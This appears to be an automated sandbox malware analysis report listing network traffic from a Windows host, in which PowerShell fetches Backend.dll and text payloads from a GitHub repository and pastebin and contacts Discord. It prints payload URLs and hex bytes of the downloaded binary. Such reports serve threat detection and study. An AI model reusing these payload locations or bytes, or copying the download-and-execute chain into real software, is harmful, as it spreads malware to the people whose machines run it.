                                                                                    Oct 15, 2024 18:08:26.107369900 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.107382059 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.107701063 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.117588997 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.163395882 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265484095 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265575886 CEST44349764104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.265826941 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.282135963 CEST49764443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:26.341139078 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.346061945 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.346143961 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.352574110 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.357383013 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.974811077 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.975440025 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.979686022 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.979763985 CEST4977080192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.980165005 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.980195045 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.980400085 CEST8049770185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:26.980797052 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.983407974 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:26.983419895 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.133083105 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133116961 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.133332014 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133714914 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.133730888 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.593990088 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.594058037 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.601486921 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.601499081 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.601792097 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.603568077 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.647392988 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729650974 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729840994 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729866982 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729887962 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.729897022 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729908943 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.729954958 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.730113029 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.730113029 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.730128050 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.741744995 CEST44349772185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.741791964 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.754092932 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.754162073 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.755985975 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.755996943 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.756258965 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.764025927 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.764661074 CEST49772443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:27.811415911 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.811487913 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:27.811501026 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991686106 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991745949 CEST44349775162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.991786957 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:28.000906944 CEST49775443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:32.844623089 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.849471092 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:32.849642992 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.855525970 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.860320091 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.485234976 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.487554073 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.487588882 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.487651110 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.490365028 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.490376949 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.528616905 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.469789028 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.469887018 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.473529100 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.473539114 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.473920107 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.479969978 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.527400970 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632415056 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632512093 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632654905 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.645668030 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.678235054 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.683291912 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.683371067 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.683706045 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.688610077 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.323663950 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.323909044 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.325493097 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.325531006 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.325583935 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.326540947 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.326586962 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.326592922 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.326602936 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.328748941 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.952161074 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.952239037 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.971770048 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.971806049 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.972136974 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.975670099 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:36.023400068 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.100991964 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101166010 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101192951 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101203918 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:36.101227045 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101264954 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:36.101466894 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101686954 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.101722956 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:36.101728916 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.109708071 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:36.109752893 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:36.143656969 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:41.181811094 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.181843996 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.181906939 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.182625055 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.182641983 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.803901911 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.804004908 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.825423956 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.825459003 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.825798035 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.826600075 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.871397972 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:41.871454954 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:41.871470928 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:42.150629997 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:42.150702953 CEST44349852162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:42.151410103 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:42.160933018 CEST49852443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:47.225375891 CEST4975980192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:48.525012970 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:48.525060892 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:48.525923967 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:48.526367903 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:48.526384115 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.144023895 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.144123077 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:49.145796061 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:49.145807028 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.146126986 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.147214890 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:49.187401056 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.188694000 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:49.188707113 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.372406006 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.372493029 CEST44349889162.159.138.232192.168.2.7
                                                                                    Oct 15, 2024 18:08:49.372545958 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:49.375399113 CEST49889443192.168.2.7162.159.138.232
                                                                                    Oct 15, 2024 18:08:54.422091007 CEST4980780192.168.2.7104.20.3.235

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 15, 2024 18:08:10.557008028 CEST6111653192.168.2.71.1.1.1
                                                                                    Oct 15, 2024 18:08:10.564726114 CEST53611161.1.1.1192.168.2.7
                                                                                    Oct 15, 2024 18:08:24.728959084 CEST5625853192.168.2.71.1.1.1
                                                                                    Oct 15, 2024 18:08:24.735841990 CEST53562581.1.1.1192.168.2.7
                                                                                    Oct 15, 2024 18:08:27.125284910 CEST4980553192.168.2.71.1.1.1
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST53498051.1.1.1192.168.2.7

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 15, 2024 18:08:10.557008028 CEST192.168.2.71.1.1.10x2172Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:24.728959084 CEST192.168.2.71.1.1.10xa12dStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.125284910 CEST192.168.2.71.1.1.10xad72Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 15, 2024 18:08:10.564726114 CEST1.1.1.1192.168.2.70x2172No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:10.564726114 CEST1.1.1.1192.168.2.70x2172No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:10.564726114 CEST1.1.1.1192.168.2.70x2172No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:10.564726114 CEST1.1.1.1192.168.2.70x2172No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:24.735841990 CEST1.1.1.1192.168.2.70xa12dNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:24.735841990 CEST1.1.1.1192.168.2.70xa12dNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:24.735841990 CEST1.1.1.1192.168.2.70xa12dNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST1.1.1.1192.168.2.70xad72No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST1.1.1.1192.168.2.70xad72No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST1.1.1.1192.168.2.70xad72No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST1.1.1.1192.168.2.70xad72No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Oct 15, 2024 18:08:27.132586002 CEST1.1.1.1192.168.2.70xad72No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • raw.githubusercontent.com
                                                                                    • pastebin.com
                                                                                    • discord.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749759104.20.3.235807548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 18:08:24.761657953 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 18:08:25.440244913 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Tue, 15 Oct 2024 16:08:25 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Tue, 15 Oct 2024 17:08:25 GMT
                                                                                    Location: https://pastebin.com/raw/sA04Mwk2
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d3111568ba8469c-DFW
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749770185.199.109.133807548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 18:08:26.352574110 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 18:08:26.974811077 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Length: 0
                                                                                    Server: Varnish
                                                                                    Retry-After: 0
                                                                                    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:26 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdal2120083-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008507.917101,VS0,VE0
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Expires: Tue, 15 Oct 2024 16:13:26 GMT
                                                                                    Vary: Authorization,Accept-Encoding


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.749807104.20.3.235807912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 18:08:32.855525970 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 18:08:33.485234976 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Tue, 15 Oct 2024 16:08:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Tue, 15 Oct 2024 17:08:33 GMT
                                                                                    Location: https://pastebin.com/raw/sA04Mwk2
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d311188eb4feb12-DFW
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.749819185.199.109.133807912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 18:08:34.683706045 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 18:08:35.323663950 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Length: 0
                                                                                    Server: Varnish
                                                                                    Retry-After: 0
                                                                                    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:35 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210062-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008515.266683,VS0,VE0
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Expires: Tue, 15 Oct 2024 16:13:35 GMT
                                                                                    Vary: Authorization,Accept-Encoding


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749701185.199.109.1334436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:11 UTC224OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:11 UTC900INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 31744
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: application/octet-stream
                                                                                    ETag: "bd4b192ae5469f45e129df181fc4929ee39a6dc957f48659a8b8da2b1d018ac5"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: E1F8:380602:8F2763:9CE16C:670E936A
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:11 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdal2120069-DFW
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008491.300035,VS0,VE98
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: 6369e3097a95d2354756dfb7b56d12a52f6279de
                                                                                    Expires: Tue, 15 Oct 2024 16:13:11 GMT
                                                                                    Source-Age: 0
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a c7 bb 58 1e a6 d5 0b 1e a6 d5 0b 1e a6 d5 0b 17 de 46 0b 18 a6 d5 0b 4c d3 d0 0a 0e a6 d5 0b 4c d3 d1 0a 16 a6 d5 0b 4c d3 d6 0a 1d a6 d5 0b 4c d3 d4 0a 18 a6 d5 0b cd d4 d4 0a 1b a6 d5 0b 1e a6 d4 0b 59 a6 d5 0b ab d3 dc 0a 0e a6 d5 0b ab d3 d5 0a 1f a6 d5 0b ab d3 2a 0b 1f a6 d5 0b ab d3 d7 0a 1f a6 d5 0b 52 69 63 68 1e a6 d5 0b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZXFLLLLY*RichPEd
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 08 ff 15 c7 4e 00 00 48 8b 05 d0 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 50 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 98 4e 00 00 48 8b 05 a1 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 81 c2 d0 00 00 00 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 66 4e 00 00 48 8b 05 6f 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 18 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 37 4e 00 00 48 8b 05 40 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 50 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 08 4e 00 00 48 8b 7d 30 85 db 74 31 48 8b 05 09 6e 00 00 48 8d 97 a8 00 00 00 89 5d 30 4c 8d 45 30 41 b9 04 00 00 00 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 af 4d 00 00
